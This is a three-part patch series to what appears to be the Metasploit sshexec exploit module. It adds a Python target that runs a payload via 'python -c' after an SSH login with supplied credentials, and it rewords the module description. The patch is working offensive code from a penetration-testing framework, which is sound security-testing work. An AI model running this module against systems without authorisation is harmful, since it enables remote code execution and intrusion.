From dfe2bbf1e9fe85ba79c2f4e3f6bc63dd6036be4b Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Wed, 12 Aug 2015 15:46:47 -0400
Subject: [PATCH 1/3] Add a python target to the sshexec module

---
 modules/exploits/multi/ssh/sshexec.rb | 58 ++++++++++++++++-----------
 1 file changed, 35 insertions(+), 23 deletions(-)

diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb
index fe6d7c1d67..0e708a6f59 100644
--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -15,56 +15,62 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize
     super(
-      'Name'        => 'SSH User Code Execution',
-      'Description' => %q{
-        This module utilizes a stager to upload a base64 encoded
+      'Name'             => 'SSH User Code Execution',
+      'Description'      => %q{
+        This module utilizes a stager to upload an encoded
         binary which is then decoded, chmod'ed and executed from
         the command shell.
       },
-      'Author'      => ['Spencer McIntyre', 'Brandon Knight'],
-      'References'  =>
+      'Author'           => ['Spencer McIntyre', 'Brandon Knight'],
+      'References'       =>
         [
           [ 'CVE', '1999-0502'] # Weak password
         ],
-      'License'     => MSF_LICENSE,
-      'Privileged'  => true,
-      'DefaultOptions' =>
+      'License'          => MSF_LICENSE,
+      'Privileged'       => true,
+      'DefaultOptions'   =>
         {
-          'PrependFork' => 'true',
-          'EXITFUNC' => 'process'
+          'PrependFork'  => 'true',
+          'EXITFUNC'     => 'process'
         },
-      'Payload'     =>
+      'Payload'          =>
         {
-          'Space'    => 4096,
-          'BadChars' => "",
-          'DisableNops' => true
+          'Space'        => 4096,
+          'BadChars'     => "",
+          'DisableNops'  => true
         },
-      'Platform'    => %w{ linux osx },
-      'Targets'     =>
+      'Platform'         => %w{ linux osx python },
+      'Targets'          =>
         [
           [ 'Linux x86',
             {
-              'Arch' => ARCH_X86,
+              'Arch'     => ARCH_X86,
               'Platform' => 'linux'
             }
           ],
           [ 'Linux x64',
             {
-              'Arch' => ARCH_X86_64,
+              'Arch'     => ARCH_X86_64,
               'Platform' => 'linux'
             }
           ],
           [ 'OSX x86',
             {
-              'Arch' => ARCH_X86,
+              'Arch'     => ARCH_X86,
               'Platform' => 'osx'
             }
+          ],
+          [ 'Python',
+            {
+              'Arch'     => ARCH_PYTHON,
+              'Platform' => 'python'
+            }
           ]
         ],
-      'CmdStagerFlavor' => %w{ bourne echo printf },
-      'DefaultTarget'  => 0,
+      'CmdStagerFlavor'  => %w{ bourne echo printf },
+      'DefaultTarget'    => 0,
       # For the CVE
-      'DisclosureDate' => 'Jan 01 1999'
+      'DisclosureDate'   => 'Jan 01 1999'
     )
 
     register_options(
@@ -128,6 +134,12 @@ class Metasploit3 < Msf::Exploit::Remote
     do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])
 
     print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending stager...")
-    execute_cmdstager({:linemax => 500})
+    if target['Platform'] == 'python'
+      execute_command("python -c \"#{payload.encoded}\"")
+    else
+      execute_cmdstager({:linemax => 500})
+    end
+
+    self.ssh_socket.close
   end
 end

From 28fbb7cdde87ac378f2e32c1bebd39aa22d1ae42 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Wed, 12 Aug 2015 16:05:09 -0400
Subject: [PATCH 2/3] Update the description of the sshexec module

---
 modules/exploits/multi/ssh/sshexec.rb | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb
index 0e708a6f59..582fd47035 100644
--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -17,9 +17,9 @@ class Metasploit3 < Msf::Exploit::Remote
     super(
       'Name'             => 'SSH User Code Execution',
       'Description'      => %q{
-        This module utilizes a stager to upload an encoded
-        binary which is then decoded, chmod'ed and executed from
-        the command shell.
+        This module connects to the target system and executes the necessary
+        commands to run the specified payload via SSH. If a native payload is
+        specified an appropriate stager will be used.
       },
       'Author'           => ['Spencer McIntyre', 'Brandon Knight'],
       'References'       =>

From 3bd6c4cee4e00ea6de35ada5386529d4addca021 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Thu, 13 Aug 2015 14:16:09 -0500
Subject: [PATCH 3/3] Add a comma

---
 modules/exploits/multi/ssh/sshexec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb
index 582fd47035..51a57cbc44 100644
--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Description'      => %q{
         This module connects to the target system and executes the necessary
         commands to run the specified payload via SSH. If a native payload is
-        specified an appropriate stager will be used.
+        specified, an appropriate stager will be used.
       },
       'Author'           => ['Spencer McIntyre', 'Brandon Knight'],
       'References'       =>